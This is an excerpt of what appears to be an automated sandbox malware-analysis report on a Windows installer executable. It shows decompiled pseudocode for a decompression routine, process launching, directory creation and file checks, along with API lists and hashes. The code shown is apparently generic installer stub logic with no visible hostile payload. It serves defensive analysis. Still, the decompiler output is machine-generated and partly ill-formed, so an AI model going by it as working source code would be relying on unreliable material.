                								_v96 = _v72;
                								goto L58;
                							}
                							L63:
                							__eax = _v92;
                							__edx = __ebx + __ebx;
                							__ecx = _v20;
                							__esi = __edx + __eax;
                							__ecx = _v20 >> 0xb;
                							__ax =  *__esi;
                							_v88 = __esi;
                							__edi = __ax & 0x0000ffff;
                							__ecx = (_v20 >> 0xb) * __edi;
                							__eflags = _v16 - __ecx;
                							if(_v16 >= __ecx) {
                								_v20 = _v20 - __ecx;
                								_v16 = _v16 - __ecx;
                								__cx = __ax;
                								_t222 = __edx + 1; // 0x1
                								__ebx = _t222;
                								__cx = __ax >> 5;
                								__eflags = __eax;
                								 *__esi = __ax;
                							} else {
                								_v20 = __ecx;
                								0x800 = 0x800 - __edi;
                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                								__ebx = __ebx + __ebx;
                								 *__esi = __cx;
                							}
                							__eflags = _v20 - 0x1000000;
                							_v72 = __ebx;
                							if(_v20 >= 0x1000000) {
                								goto L62;
                							} else {
                								goto L60;
                							}
                						case 0x10:
                							L112:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								_v140 = 0x10;
                								goto L173;
                							}
                							__ecx = _v116;
                							__eax = _v16;
                							_v20 = _v20 << 8;
                							__ecx =  *_v116 & 0x000000ff;
                							_v112 = _v112 - 1;
                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							_t371 =  &_v116;
                							 *_t371 = _v116 + 1;
                							__eflags =  *_t371;
                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							goto L114;
                						case 0x11:
                							L71:
                							__esi = _v92;
                							_v136 = 0x12;
                							goto L135;
                						case 0x12:
                							__eflags = _v68;
                							if(_v68 != 0) {
                								__eax = _v92;
                								_v136 = 0x13;
                								__esi = _v92 + 2;
                								L135:
                								_v88 = _t626;
                								goto L136;
                							}
                							__eax = _v80;
                							_v52 = _v52 & 0x00000000;
                							__ecx = _v92;
                							__eax = _v80 << 4;
                							__eflags = __eax;
                							__eax = _v92 + __eax + 4;
                							goto L133;
                						case 0x13:
                							__eflags = _v68;
                							if(_v68 != 0) {
                								_t475 =  &_v92;
                								 *_t475 = _v92 + 0x204;
                								__eflags =  *_t475;
                								_v52 = 0x10;
                								_v68 = 8;
                								L147:
                								_v128 = 0x14;
                								goto L148;
                							}
                							__eax = _v80;
                							__ecx = _v92;
                							__eax = _v80 << 4;
                							_v52 = 8;
                							__eax = _v92 + (_v80 << 4) + 0x104;
                							L133:
                							_v92 = __eax;
                							_v68 = 3;
                							goto L147;
                						case 0x14:
                							_v52 = _v52 + __ebx;
                							__eax = _v132;
                							goto L143;
                						case 0x15:
                							__eax = 0;
                							__eflags = _v60 - 7;
                							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                							__al = __al & 0x000000fd;
                							__eax = (__eflags >= 0) - 1 + 0xb;
                							_v60 = (__eflags >= 0) - 1 + 0xb;
                							goto L123;
                						case 0x16:
                							__eax = _v52;
                							__eflags = __eax - 4;
                							if(__eax >= 4) {
                								_push(3);
                								_pop(__eax);
                							}
                							__ecx = _v8;
                							_v68 = 6;
                							__eax = __eax << 7;
                							_v128 = 0x19;
                							_v92 = __eax;
                							goto L148;
                						case 0x17:
                							L148:
                							__eax = _v68;
                							_v84 = 1;
                							_v76 = _v68;
                							goto L152;
                						case 0x18:
                							L149:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								_v140 = 0x18;
                								goto L173;
                							}
                							__ecx = _v116;
                							__eax = _v16;
                							_v20 = _v20 << 8;
                							__ecx =  *_v116 & 0x000000ff;
                							_v112 = _v112 - 1;
                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							_t490 =  &_v116;
                							 *_t490 = _v116 + 1;
                							__eflags =  *_t490;
                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							L151:
                							_t493 =  &_v76;
                							 *_t493 = _v76 - 1;
                							__eflags =  *_t493;
                							L152:
                							__eflags = _v76;
                							if(_v76 <= 0) {
                								__ecx = _v68;
                								__ebx = _v84;
                								0 = 1;
                								__eax = 1 << __cl;
                								__ebx = _v84 - (1 << __cl);
                								__eax = _v128;
                								_v72 = __ebx;
                								L143:
                								_v140 = _t561;
                								goto L3;
                							}
                							__eax = _v84;
                							_v20 = _v20 >> 0xb;
                							__edx = _v84 + _v84;
                							__eax = _v92;
                							__esi = __edx + __eax;
                							_v88 = __esi;
                							__ax =  *__esi;
                							__edi = __ax & 0x0000ffff;
                							__ecx = (_v20 >> 0xb) * __edi;
                							__eflags = _v16 - __ecx;
                							if(_v16 >= __ecx) {
                								_v20 = _v20 - __ecx;
                								_v16 = _v16 - __ecx;
                								__cx = __ax;
                								__cx = __ax >> 5;
                								__eax = __eax - __ecx;
                								__edx = __edx + 1;
                								__eflags = __edx;
                								 *__esi = __ax;
                								_v84 = __edx;
                							} else {
                								_v20 = __ecx;
                								0x800 = 0x800 - __edi;
                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                								_v84 = _v84 << 1;
                								 *__esi = __cx;
                							}
                							__eflags = _v20 - 0x1000000;
                							if(_v20 >= 0x1000000) {
                								goto L151;
                							} else {
                								goto L149;
                							}
                						case 0x19:
                							__eflags = __ebx - 4;
                							if(__ebx < 4) {
                								_v48 = __ebx;
                								L122:
                								_t399 =  &_v48;
                								 *_t399 = _v48 + 1;
                								__eflags =  *_t399;
                								L123:
                								__eax = _v48;
                								__eflags = __eax;
                								if(__eax == 0) {
                									_v52 = _v52 | 0xffffffff;
                									goto L173;
                								}
                								__eflags = __eax - _v100;
                								if(__eax > _v100) {
                									goto L174;
                								}
                								_v52 = _v52 + 2;
                								__eax = _v52;
                								_t406 =  &_v100;
                								 *_t406 = _v100 + _v52;
                								__eflags =  *_t406;
                								goto L126;
                							}
                							__ecx = __ebx;
                							__eax = __ebx;
                							__ecx = __ebx >> 1;
                							__eax = __ebx & 0x00000001;
                							__ecx = (__ebx >> 1) - 1;
                							__al = __al | 0x00000002;
                							__eax = (__ebx & 0x00000001) << __cl;
                							__eflags = __ebx - 0xe;
                							_v48 = __eax;
                							if(__ebx >= 0xe) {
                								__ebx = 0;
                								_v76 = __ecx;
                								L105:
                								__eflags = _v76;
                								if(_v76 <= 0) {
                									__eax = __eax + __ebx;
                									_v68 = 4;
                									_v48 = __eax;
                									__eax = _v8;
                									__eax = _v8 + 0x644;
                									__eflags = __eax;
                									L111:
                									__ebx = 0;
                									_v92 = __eax;
                									_v84 = 1;
                									_v72 = 0;
                									_v76 = 0;
                									L115:
                									__eax = _v68;
                									__eflags = _v76 - _v68;
                									if(_v76 >= _v68) {
                										_t397 =  &_v48;
                										 *_t397 = _v48 + __ebx;
                										__eflags =  *_t397;
                										goto L122;
                									}
                									__eax = _v84;
                									_v20 = _v20 >> 0xb;
                									__edi = _v84 + _v84;
                									__eax = _v92;
                									__esi = __edi + __eax;
                									_v88 = __esi;
                									__ax =  *__esi;
                									__ecx = __ax & 0x0000ffff;
                									__edx = (_v20 >> 0xb) * __ecx;
                									__eflags = _v16 - __edx;
                									if(_v16 >= __edx) {
                										__ecx = 0;
                										_v20 = _v20 - __edx;
                										__ecx = 1;
                										_v16 = _v16 - __edx;
                										__ebx = 1;
                										__ecx = _v76;
                										__ebx = 1 << __cl;
                										__ecx = 1 << __cl;
                										__ebx = _v72;
                										__ebx = _v72 | __ecx;
                										__cx = __ax;
                										__cx = __ax >> 5;
                										__eax = __eax - __ecx;
                										__edi = __edi + 1;
                										__eflags = __edi;
                										_v72 = __ebx;
                										 *__esi = __ax;
                										_v84 = __edi;
                									} else {
                										_v20 = __edx;
                										0x800 = 0x800 - __ecx;
                										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                										_v84 = _v84 << 1;
                										 *__esi = __dx;
                									}
                									__eflags = _v20 - 0x1000000;
                									if(_v20 >= 0x1000000) {
                										L114:
                										_t374 =  &_v76;
                										 *_t374 = _v76 + 1;
                										__eflags =  *_t374;
                										goto L115;
                									} else {
                										goto L112;
                									}
                								}
                								__ecx = _v16;
                								__ebx = __ebx + __ebx;
                								_v20 = _v20 >> 1;
                								__eflags = _v16 - _v20;
                								_v72 = __ebx;
                								if(_v16 >= _v20) {
                									__ecx = _v20;
                									_v16 = _v16 - _v20;
                									__ebx = __ebx | 0x00000001;
                									__eflags = __ebx;
                									_v72 = __ebx;
                								}
                								__eflags = _v20 - 0x1000000;
                								if(_v20 >= 0x1000000) {
                									L104:
                									_t344 =  &_v76;
                									 *_t344 = _v76 - 1;
                									__eflags =  *_t344;
                									goto L105;
                								} else {
                									goto L102;
                								}
                							}
                							__edx = _v8;
                							__eax = __eax - __ebx;
                							_v68 = __ecx;
                							__eax = _v8 + 0x55e + __eax * 2;
                							goto L111;
                						case 0x1a:
                							L58:
                							__eflags = _v104;
                							if(_v104 == 0) {
                								_v140 = 0x1a;
                								goto L173;
                							}
                							__ecx = _v108;
                							__al = _v96;
                							__edx = _v12;
                							_v100 = _v100 + 1;
                							_v108 = _v108 + 1;
                							_v104 = _v104 - 1;
                							 *_v108 = __al;
                							__ecx = _v24;
                							 *(_v12 + __ecx) = __al;
                							__eax = __ecx + 1;
                							__edx = 0;
                							_t197 = __eax % _v120;
                							__eax = __eax / _v120;
                							__edx = _t197;
                							goto L82;
                						case 0x1b:
                							L78:
                							__eflags = _v104;
                							if(_v104 == 0) {
                								_v140 = 0x1b;
                								goto L173;
                							}
                							__eax = _v24;
                							__eax = _v24 - _v48;
                							__eflags = __eax - _v120;
                							if(__eax >= _v120) {
                								__eax = __eax + _v120;
                								__eflags = __eax;
                							}
                							__edx = _v12;
                							__cl =  *(__edx + __eax);
                							__eax = _v24;
                							_v96 = __cl;
                							 *(__edx + __eax) = __cl;
                							__eax = __eax + 1;
                							__edx = 0;
                							_t280 = __eax % _v120;
                							__eax = __eax / _v120;
                							__edx = _t280;
                							__eax = _v108;
                							_v100 = _v100 + 1;
                							_v108 = _v108 + 1;
                							_t289 =  &_v104;
                							 *_t289 = _v104 - 1;
                							__eflags =  *_t289;
                							 *_v108 = __cl;
                							L82:
                							_v24 = __edx;
                							goto L83;
                						case 0x1c:
                							while(1) {
                								L126:
                								__eflags = _v104;
                								if(_v104 == 0) {
                									break;
                								}
                								__eax = _v24;
                								__eax = _v24 - _v48;
                								__eflags = __eax - _v120;
                								if(__eax >= _v120) {
                									__eax = __eax + _v120;
                									__eflags = __eax;
                								}
                								__edx = _v12;
                								__cl =  *(__edx + __eax);
                								__eax = _v24;
                								_v96 = __cl;
                								 *(__edx + __eax) = __cl;
                								__eax = __eax + 1;
                								__edx = 0;
                								_t420 = __eax % _v120;
                								__eax = __eax / _v120;
                								__edx = _t420;
                								__eax = _v108;
                								_v108 = _v108 + 1;
                								_v104 = _v104 - 1;
                								_v52 = _v52 - 1;
                								__eflags = _v52;
                								 *_v108 = __cl;
                								_v24 = _t420;
                								if(_v52 > 0) {
                									continue;
                								} else {
                									L83:
                									_v140 = 2;
                									goto L3;
                								}
                							}
                							_v140 = 0x1c;
                							L173:
                							_push(0x22);
                							_pop(_t574);
                							memcpy(_v148,  &_v140, _t574 << 2);
                							return 0;
                					}
                				}
                				L174:
                				_t538 = _t537 | 0xffffffff;
                				return _t538;
                			}

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID:
                • String ID: tCPInfo
                • API String ID: 0-2120998202
                • Opcode ID: b0886b8647590f49d196a4ae9d285ef76414e2f02c97ef520e18707fbbef2023
                • Instruction ID: 41b63ac7315969e8c4cdeb39c952146f886d2b6e08649ca9387d619dcd40c967
                • Opcode Fuzzy Hash: b0886b8647590f49d196a4ae9d285ef76414e2f02c97ef520e18707fbbef2023
                • Instruction Fuzzy Hash: A8817871D04229CFDF24CFA8C8447AEBBB0FB44305F25816AD856BB281D7785A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 627 4056c8-4056e3 call 405af4 call 40567b 632 4056e5-4056e7 627->632 633 4056e9-4056f6 call 405d03 627->633 634 40573b-40573d 632->634 637 405702-405704 633->637 638 4056f8-4056fc 633->638 640 40571a-405723 lstrlenA 637->640 638->632 639 4056fe-405700 638->639 639->632 639->637 641 405725-405739 call 4055e7 GetFileAttributesA 640->641 642 405706-40570d call 405d9c 640->642 641->634 647 405714-405715 call 40562e 642->647 648 40570f-405712 642->648 647->640 648->632 648->647
                C-Code - Quality: 53%
                			E004056C8(void* __eflags, intOrPtr _a4) {
                				int _t11;
                				signed char* _t12;
                				long _t16;
                				intOrPtr _t18;
                				intOrPtr* _t21;
                				void* _t22;
                
                				E00405AF4(0x421938, _a4);
                				_t21 = E0040567B(0x421938);
                				if(_t21 != 0) {
                					E00405D03(_t21);
                					if(( *0x423f30 & 0x00000080) == 0) {
                						L5:
                						_t22 = _t21 - 0x421938;
                						while(1) {
                							_t11 = lstrlenA(0x421938);
                							_push(0x421938);
                							if(_t11 <= _t22) {
                								break;
                							}
                							_t12 = E00405D9C();
                							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                								E0040562E(0x421938);
                								continue;
                							} else {
                								goto L1;
                							}
                						}
                						E004055E7();
                						_t16 = GetFileAttributesA(??); // executed
                						return 0 | _t16 != 0xffffffff;
                					}
                					_t18 =  *_t21;
                					if(_t18 == 0 || _t18 == 0x5c) {
                						goto L1;
                					} else {
                						goto L5;
                					}
                				}
                				L1:
                				return 0;
                			}










                APIs
                  • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,xwkwrbeiqiuu Setup,NSIS Error), ref: 00405B01
                  • Part of subcall function 0040567B: CharNextA.USER32(:T@,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\,?,004056DF,C:\,C:\,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,76DDF560,0040543A,?,76DDF560,00000000), ref: 00405689
                  • Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040568E
                  • Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040569D
                • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,76DDF560,0040543A,?,76DDF560,00000000), ref: 0040571B
                • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,76DDF560,0040543A,?,76DDF560,00000000), ref: 0040572B
                Strings
                Similarity
                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                • String ID: "C:\Users\user\Desktop\O1ySvN9SvL.exe" $C:\
                • API String ID: 3248276644-2535334965
                • Opcode ID: d7a6fd6b08d9551768931ca80393006ad21f6be298864b6a11b3b7159a130088
                • Instruction ID: c9a5ad2ab4ff501f0e3d3fb61e1c810f238de096eca0db9d00b0265de3cbf42b
                • Opcode Fuzzy Hash: d7a6fd6b08d9551768931ca80393006ad21f6be298864b6a11b3b7159a130088
                • Instruction Fuzzy Hash: 81F04C25116D5152C72233392C09AAF1755CE9632CB48093BF865B22E2DB3D8803ED7E
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 650 405361-40538e CreateProcessA 651 405390-405399 CloseHandle 650->651 652 40539c-40539d 650->652 651->652
                C-Code - Quality: 100%
                			E00405361(CHAR* _a4) {
                				struct _PROCESS_INFORMATION _v20;
                				int _t7;
                
                				0x422538->cb = 0x44;
                				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422538,  &_v20); // executed
                				if(_t7 != 0) {
                					CloseHandle(_v20.hThread);
                					return _v20.hProcess;
                				}
                				return _t7;
                			}






                APIs
                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422538,Error launching installer), ref: 00405386
                • CloseHandle.KERNEL32(?), ref: 00405393
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405361
                • Error launching installer, xrefs: 00405374
                Similarity
                • API ID: CloseCreateHandleProcess
                • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                • API String ID: 3712363035-7751565
                • Opcode ID: 95266c0028550c5be94e5f06544d2cc5b2c8f5817e632bf3c1e547dcfbef7da9
                • Instruction ID: 4b3b5e29b82f538c1f6189d2f0b4571506454f650d891e3160212e6729b48b77
                • Opcode Fuzzy Hash: 95266c0028550c5be94e5f06544d2cc5b2c8f5817e632bf3c1e547dcfbef7da9
                • Instruction Fuzzy Hash: 9AE012B4A00209BFDB00EF64ED49E6FBBBCFB10344F808571B914F2151D7B8E9508A69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E004032C6(void* __eflags) {
                				void* _t2;
                				void* _t5;
                				CHAR* _t6;
                
                				_t6 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
                				E00405D03(_t6);
                				_t2 = E00405654(_t6);
                				if(_t2 != 0) {
                					E004055E7(_t6);
                					CreateDirectoryA(_t6, 0); // executed
                					_t5 = E004057FA("1033", _t6); // executed
                					return _t5;
                				} else {
                					return _t2;
                				}
                			}







                APIs
                  • Part of subcall function 00405D03: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D5B
                  • Part of subcall function 00405D03: CharNextA.USER32(?,?,?,00000000), ref: 00405D68
                  • Part of subcall function 00405D03: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D6D
                  • Part of subcall function 00405D03: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D7D
                • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 004032E7
                Strings
                Similarity
                • API ID: Char$Next$CreateDirectoryPrev
                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                • API String ID: 4115351271-2030658151
                • Opcode ID: c49a4ae33f7a441e05ad4f45e3ad89d0cea47cd121eda0228c9a518e283b1627
                • Instruction ID: d6c3561ce191540899b591fc5212b2685f70515619ba473533d6486adf82dab9
                • Opcode Fuzzy Hash: c49a4ae33f7a441e05ad4f45e3ad89d0cea47cd121eda0228c9a518e283b1627
                • Instruction Fuzzy Hash: 6BD0C911656D3072C9523B2A3D0AFCF150C8F5631AF5180BBF908B90C64B6C6A8319EF
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 99%
                			E004064B8() {
                				signed int _t530;
                				void _t537;
                				signed int _t538;
                				signed int _t539;
                				unsigned short _t569;
                				signed int _t579;
                				signed int _t607;
                				void* _t627;
                				signed int _t628;
                				signed int _t635;
                				signed int* _t643;
                				void* _t644;
                
                				L0:
                				while(1) {
                					L0:
                					_t530 =  *(_t644 - 0x30);
                					if(_t530 >= 4) {
                					}
                					 *(_t644 - 0x40) = 6;
                					 *(_t644 - 0x7c) = 0x19;
                					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                					while(1) {
                						L145:
                						 *(_t644 - 0x50) = 1;
                						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                						while(1) {
                							L149:
                							if( *(_t644 - 0x48) <= 0) {
                								goto L155;
                							}
                							L150:
                							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                							 *(_t644 - 0x54) = _t643;
                							_t569 =  *_t643;
                							_t635 = _t569 & 0x0000ffff;
                							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                							if( *(_t644 - 0xc) >= _t607) {
                								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                								_t628 = _t627 + 1;
                								 *_t643 = _t569 - (_t569 >> 5);
                								 *(_t644 - 0x50) = _t628;
                							} else {
                								 *(_t644 - 0x10) = _t607;
                								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                							}
                							if( *(_t644 - 0x10) >= 0x1000000) {
                								L148:
                								_t487 = _t644 - 0x48;
                								 *_t487 =  *(_t644 - 0x48) - 1;
                								L149:
                								if( *(_t644 - 0x48) <= 0) {
                									goto L155;
                								}
                								goto L150;
                							} else {
                								L154:
                								L146:
                								if( *(_t644 - 0x6c) == 0) {
                									L169:
                									 *(_t644 - 0x88) = 0x18;
                									L170:
                									_t579 = 0x22;
                									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                									_t539 = 0;
                									L172:
                									return _t539;
                								}
                								L147:
                								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                								_t484 = _t644 - 0x70;
                								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                								goto L148;
                							}
                							L155:
                							_t537 =  *(_t644 - 0x7c);
                							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                							while(1) {
                								L140:
                								 *(_t644 - 0x88) = _t537;
                								while(1) {
                									L1:
                									_t538 =  *(_t644 - 0x88);
                									if(_t538 > 0x1c) {
                										break;
                									}
                									L2:
                									switch( *((intOrPtr*)(_t538 * 4 +  &M00406926))) {
                										case 0:
                											L3:
                											if( *(_t644 - 0x6c) == 0) {
                												goto L170;
                											}
                											L4:
                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                											_t538 =  *( *(_t644 - 0x70));
                											if(_t538 > 0xe1) {
                												goto L171;
                											}
                											L5:
                											_t542 = _t538 & 0x000000ff;
                											_push(0x2d);
                											asm("cdq");
                											_pop(_t581);
                											_push(9);
                											_pop(_t582);
                											_t638 = _t542 / _t581;
                											_t544 = _t542 % _t581 & 0x000000ff;
                											asm("cdq");
                											_t633 = _t544 % _t582 & 0x000000ff;
                											 *(_t644 - 0x3c) = _t633;
                											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                											_t641 = (0x300 << _t633 + _t638) + 0x736;
                											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                												L10:
                												if(_t641 == 0) {
                													L12:
                													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                													goto L15;
                												} else {
                													goto L11;
                												}
                												do {
                													L11:
                													_t641 = _t641 - 1;
                													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                												} while (_t641 != 0);
                												goto L12;
                											}
                											L6:
                											if( *(_t644 - 4) != 0) {
                												GlobalFree( *(_t644 - 4));
                											}
                											_t538 = GlobalAlloc(0x40, 0x600); // executed
                											 *(_t644 - 4) = _t538;
                											if(_t538 == 0) {
                												goto L171;
                											} else {
                												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                												goto L10;
                											}
                										case 1:
                											L13:
                											__eflags =  *(_t644 - 0x6c);
                											if( *(_t644 - 0x6c) == 0) {
                												L157:
                												 *(_t644 - 0x88) = 1;
                												goto L170;
                											}
                											L14:
                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                											_t45 = _t644 - 0x48;
                											 *_t45 =  *(_t644 - 0x48) + 1;
                											__eflags =  *_t45;
                											L15:
                											if( *(_t644 - 0x48) < 4) {
                												goto L13;
                											}
                											L16:
                											_t550 =  *(_t644 - 0x40);
                											if(_t550 ==  *(_t644 - 0x74)) {
                												L20:
                												 *(_t644 - 0x48) = 5;
                												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                												goto L23;
                											}
                											L17:
                											 *(_t644 - 0x74) = _t550;
                											if( *(_t644 - 8) != 0) {
                												GlobalFree( *(_t644 - 8));
                											}
                											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                											 *(_t644 - 8) = _t538;
                											if(_t538 == 0) {
                												goto L171;
                											} else {
                												goto L20;
                											}
                										case 2:
                											L24:
                											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                											 *(_t644 - 0x84) = 6;
                											 *(_t644 - 0x4c) = _t557;
                											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                											goto L132;
                										case 3:
                											L21:
                											__eflags =  *(_t644 - 0x6c);
                											if( *(_t644 - 0x6c) == 0) {
                												L158:
                												 *(_t644 - 0x88) = 3;
                												goto L170;
                											}
                											L22:
                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                											_t67 = _t644 - 0x70;
                											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                											__eflags =  *_t67;
                											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                											L23:
                											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                											if( *(_t644 - 0x48) != 0) {
                												goto L21;
                											}
                											goto L24;
                										case 4:
                											L133:
                											_t559 =  *_t642;
                											_t626 = _t559 & 0x0000ffff;
                											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                											if( *(_t644 - 0xc) >= _t596) {
                												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                												 *(_t644 - 0x40) = 1;
                												_t560 = _t559 - (_t559 >> 5);
                												__eflags = _t560;
                												 *_t642 = _t560;
                											} else {
                												 *(_t644 - 0x10) = _t596;
                												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                											}
                											if( *(_t644 - 0x10) >= 0x1000000) {
                												goto L139;
                											} else {
                												goto L137;
                											}
                										case 5:
                											L137:
                											if( *(_t644 - 0x6c) == 0) {
                												L168:
                												 *(_t644 - 0x88) = 5;
                												goto L170;
                											}
                											L138:
                											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                											L139:
                											_t537 =  *(_t644 - 0x84);
                											L140:
                											 *(_t644 - 0x88) = _t537;
                											goto L1;
                										case 6:
                											L25:
                											__edx = 0;
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												L36:
                												__eax =  *(__ebp - 4);
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) = 1;
                												 *(__ebp - 0x84) = 7;
                												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                												goto L132;
                											}
                											L26:
                											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                											__esi =  *(__ebp - 0x60);
                											__cl = 8;
                											__cl = 8 -  *(__ebp - 0x3c);
                											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                											__ecx =  *(__ebp - 0x3c);
                											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                											__ecx =  *(__ebp - 4);
